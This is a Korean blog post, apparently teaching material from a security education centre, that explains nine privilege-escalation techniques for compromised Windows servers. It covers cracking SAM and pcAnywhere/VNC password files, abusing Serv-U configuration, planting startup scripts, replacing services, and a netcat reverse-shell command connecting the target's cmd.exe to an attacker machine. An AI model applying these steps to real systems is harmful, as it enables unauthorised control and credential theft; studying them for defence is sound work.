안녕하세요.
문보안관 입니다.
해커가 만약 침투할 컴퓨터에 침입을 성공하였더라도 그 컴퓨터에 대한 권한이 없다면 마음대로 해킹 할 수 없다.
그만큼 목표 컴퓨터의 권한을 획득한다는 것은 침입을 성공하는 것만큼 중요한 작업이다.
본 자료는 해커가 침입을 성공한 후 권한을 상승하는 기법에 대해 9가지로 정리하여 설명하고 있다.
1. RAdmin 툴을 이용한 권한 상승
Radmin 툴 ( 기본 포트 : 4899 ) 은 자신의 컴퓨터에서 원격 컴퓨터를 제어하는 프로그램 으로서 파일 전송, NT 보안, 텔넷 등의 주요한
기능을 원격에서 사용할 수 있다.
침투할 서버에 대한 약간의 권한이 존재하고 방화벽이 존재하지 않는다면 Radmin 서버를 압축하고 업로드 한 다음 실행하고 클라이언트로
접속을 한다.
[Radmin]
2. pcAnywhere 툴을 이용한 권한 상승
pcAnywhere 툴 ( 기본 포트 : 5631/5632 ) 는 Symatec에서 제작한 원격 제어 프로그램으로서 RAdmin
툴과 마찬가지로 원격에서 여러가지 기능을 사용할 수 있도록 제공하고 있다.
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 이 폴더에 저장되어 있는 cif 파일을
다운 받아 패스워드 크랙한 다음 접속 한다.
[ pcAnywhere 툴]
3. SAM 파일 크랙을 통한 권한 상승
SAM ( Security Account Manager ) 파일은 C:\WINNT\system32\config\ 에 위치하며, 사용자 / 그롭 계정 정보에 대한 데이터베이스를
관리 한다. 사용자의 로그인 입력 정보와 SAM 데이터베이스 정보를 비교하여 인증 여부를 결정하도록 해주는 것이다.
목표 서버에 SAM 파일을 다운받아 크랙하여 사용자 ID/PW 정보를 획득하여 관리자 권한을 상승 할 수 있다.
[ SAM 파일 크랙 화면 ]
4. Serv-U 툴을 이용한 권한 상승
SerV - U 툴은 자신의 컴퓨터를 FTP 서버로 만들어 주는 프로그램으로 WFTPD 와 함께 가장 유명하고 넓은 인지도를 확보하고 있는 프로그램이다.
[ Serv-U 를 실행한 화면 ]
목표 서버의 C:\Documents and Settings\All Users\시작 메뉴\프로그램\ 에서 Serv-U의 경로를 알아낸 다음 그 폴더로 이동하여
ServUDaemon.ini 를 수정할 수 있는지 확인한다.
만약 수정이 가능하면 사용자 한 명을 추가한 뒤 패스워드는 Null 로 설정 한다.
ServUDaemon.ini
그리고 FTP로 접속을 하여 명령어 quoto site exec [cmd] 로 권한 상승 한다.
다른 방법으로 침투 서버에 설치된 servudaemon.ini 파일을 다운받은 후 자신의 컴퓨터에 serv-U를 설치하여 덮어쓰기를 하면
모든 설정이 목표 서버의 설정과 동일하게 된다.
또 다른 방법으로는 Serv-U 로컬 포트를 이용하는 것이다. Serv-U 로컬관리 포트는 43958포트이다.
Fpipe.exe 를 업로드 하여 아래와 같은 명령을 실행 한다.
Fpipe -v -l 3333 -r 43958 127.0.0.1
5. CScript 실행
cscript c:\inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 명령어는 권한이 있어야 볼 수 있는 dll 파일을 볼 수 있다.
그리고 asp.dll 파일을 이 그룹에 추가한다.
asp.dll 파일은 c:\winnt\system32\inetsrv\ 에 위치하여 있다.
부동한 서버에 저장된 위치도 다를 수도 있지만, 추가하는 방법은 다음과 같다.
cscript adsutil.vbs get /W3SVC/InProcesslsapiApps 명령어로 추가되었는지 살펴볼 수 있다.
6. 스크립트 파일을 이용한 권한 상승
"c:\Documents and Settings\All Users\시작메뉴\프로그램\시작프로그램"에 bat,vbs 파일을 추가한다.
7. Vnc 툴을 이용한 권한 상승
Vnc 툴 ( 기본 포트 : 5800 ) 역시 pcAnywhere 나 RAdmin 처럼 원격 제어 프로그램 이다.
Vnc 패스워드는 디폴트로 HKCU\Software\ORL\WinVNC3\Password 에 위치하여 있다.
이는 vncx4 로 크랙할 수 있다.
Vncx4의 사용법은 아주 간단하다.
cmd 모드에서 아래와 같이 입력 한다
c:\vncx4 -W
그리고 순서적으로 16진수를 입력하면 된다.
8. nc로 업그레이드
침투 서버에서 nc 를 실행하여 리버스커넥션으로 자신의 컴퓨터로 연결한다.
하지만 이는 일정한 권한이 있어야 가능하다.
<사용 예제>
해커컴퓨터 : nc.exe -l -p 80
침투컴퓨터 : nc.exe -e cmd.exe 192.168.0.9 80
9. 서비스 변경
윈도우 OS 에 설치되어 있는 기본 서비스를 악의적 프로그램으로 바꿔놓고 서버를 재부팅 시킨다.
이상 침투 후 권한 상승에 대한 정보를 살펴 보았습니다.
담엔 더 알찬 자료로 다가오겠습니다.
좋은 하루요~~
[출처] 시스템 권한 해킹 기법 (국제정보보안교육센터) |작성자 문보안관
'시스템보안(지식창고)' 카테고리의 다른 글
pentest 기법들 (0) | 2013.06.09 |
---|---|
mssql추천 사이트 (0) | 2013.06.05 |
cron 데몬을 이용한 백도어 생성 (0) | 2013.02.15 |
Setuid를 이용한 백도어 만들기(3)- 백도어 찾아내기와 백도어 숨기기 (0) | 2013.02.15 |
Setuid를 이용한 백도어 만들기(2)-백도어를 만드는 또 다른 방법들 (0) | 2013.02.15 |